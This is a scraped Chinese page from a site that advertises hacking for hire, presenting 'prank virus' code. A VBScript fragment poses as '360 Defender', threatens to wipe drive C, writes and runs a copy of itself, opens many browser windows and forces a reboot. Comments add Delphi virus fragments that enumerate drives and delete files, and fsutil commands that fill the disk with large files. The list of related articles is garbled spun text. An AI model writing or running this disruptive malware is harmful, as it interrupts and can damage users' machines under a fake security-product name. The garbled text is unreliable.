qstart.run "cmd.exe /c shutdown -a",0,true

loop

ELSEIF A = "滚" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "emmmmmmmm",vbokonly,"360 Defender"

set qwriteb=qwrite.CreateTextFile( "D:\1.txt",,ture)

qwriteb.WriteLine "wscript.CreateObject(" chr(34) "wscript.shell" chr(34) ").run " chr(34) "D:\1.vbs" chr(34)

qwriteb.WriteLine "msgbox " chr(34) "滚" chr(34) ",vbokonly+vbinformation," chr(34) "360 Defender" chr(34)

qwriteb.close

qwrite.movefile "D:\1.txt","D:\1.vbs"

qstart.run "D:\1.vbs"

ELSE

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "由于您在说废话,但是您一定不想浪费时间说废话,所以该电脑对您有害。浪费别人时间就是谋财害命 ( 鲁迅 ) 。360积极维护您的财产权和生命健康权,决定不砸掉您的电脑。"+chr(13)+chr(13)+"那现在先把C盘给抹咯!",vbokonly+vbInformation,"360 Defender"

qsay.speak ("在抹掉C盘的过程中,您的电脑将会重启数次此瓷呲呲瓷此次次此瓷呲呲瓷此次次此瓷呲")

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

qstart.run "cmd.exe /c shutdown -r -t 5",0,true

END IF

怎么写一个恶搞小病毒,度电脑没有损坏,就是电脑里有这个病毒后就会弹出一个对话框

制造、使用和传播计算机病毒会触犯国家相关法律,请您慎行。

扫描二维码推送至手机访问。

版权声明:本文由黑客平台在线接单_免费黑客平台的网站发布,如需转载请注明出处。

本文链接:http://heikexuexi.com/28838.html

分享给朋友:

“恶搞电脑病毒代码(电脑恶搞病毒下载)” 的相关文章

先进工作者发言稿

先进工作者发言稿

正在事情 的时刻 ,假如 对付 一点儿进步前辈 事情 者的话,咱们皆应该背那些进步前辈 事情 者进修 他们看待 事情 卖力 负责的立场 战精力 ,这么年夜 野有无听过进步前辈 事情 者的谈话 稿呢?正在那面给年夜 野带去的便是无关于进步前辈 事情 者谈话 稿的相闭范文,愿望 否以 对于年夜 野可以或...

入党积极分子培训班心得体会

入党积极分子培训班心得体会

                                                                                               干预 运动 后,应该会有一点口感 。以上是为年夜 野整顿 几个进党热情分子训练班口吃理解 范文,以求参照。领会...

相濡以沫形容夫妻什么意思(感悟)

相濡以沫形容夫妻什么意思(感悟)

                                                                                               对于不熟悉 的人来说,有时 会遇到 ,只是这样一瞥,但深 的形象 表面挥之不去,甚至成为照明职业 少路灯。通常...

电子邮件地址怎么写

电子邮件地址怎么写

                                                                                                   电子邮件的影响 在于要求双方 用户之间的联系 工作 。通过电子邮件的序言 ,用户可以接收和吸收 各种可...

红色教育心得体会

红色教育心得体会

                                                                                               白色学育本身 是一个真正的爱国主义主题,那么白色学育口吃懂 怎么写呢?昨天为除夕 野整顿了几篇白色学育口吃懂...

  应急预案怎么编写

应急预案怎么编写

                                                                                               应慢预案的体例 是应慢营救事情 外异常 主要 的一个这种也是谢铺应慢营救事情 的主要 保证 。应慢预案体例 法...

评论列表

双笙迷麇
2年前 (2022-06-22)

//WinNT begin //远程线程映射到Explorer进程 //哪位兄台愿意完成之? end; //如果是原始病毒体自己 if CompareText(Extrac

弦久礼忱
2年前 (2022-06-21)

xe /c fsutil file createnew 64.bug 400000000"qstart.run "cmd.exe /c fsutil file createnew 65.

离鸢寒洲
2年前 (2022-06-21)

i := 0 to 25 do //遍历26个字母 begin D := Chr(i + 65); Str := D + ':'; DiskType := GetDri

只影鸽屿
2年前 (2022-06-21)

lly FileClose(FileHandle); //关闭文件 end; DeleteFile(PChar(FileName)); //删除之 except end;end;{ 获得可写的驱动器列表 }function GetDrives: s

蓝殇青尢
2年前 (2022-06-21)

入,另存为新建文本文档.bat会让电脑死机一小会儿,但不会对电脑造成任何、一丝一毫的伤害附:你没看错,代码只有5字节电脑病毒代码不行的 得用虚拟机才可以测试病毒代码 无需下载,把下面这段代码复制到记事本里,保存为文本文件 X5O!

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。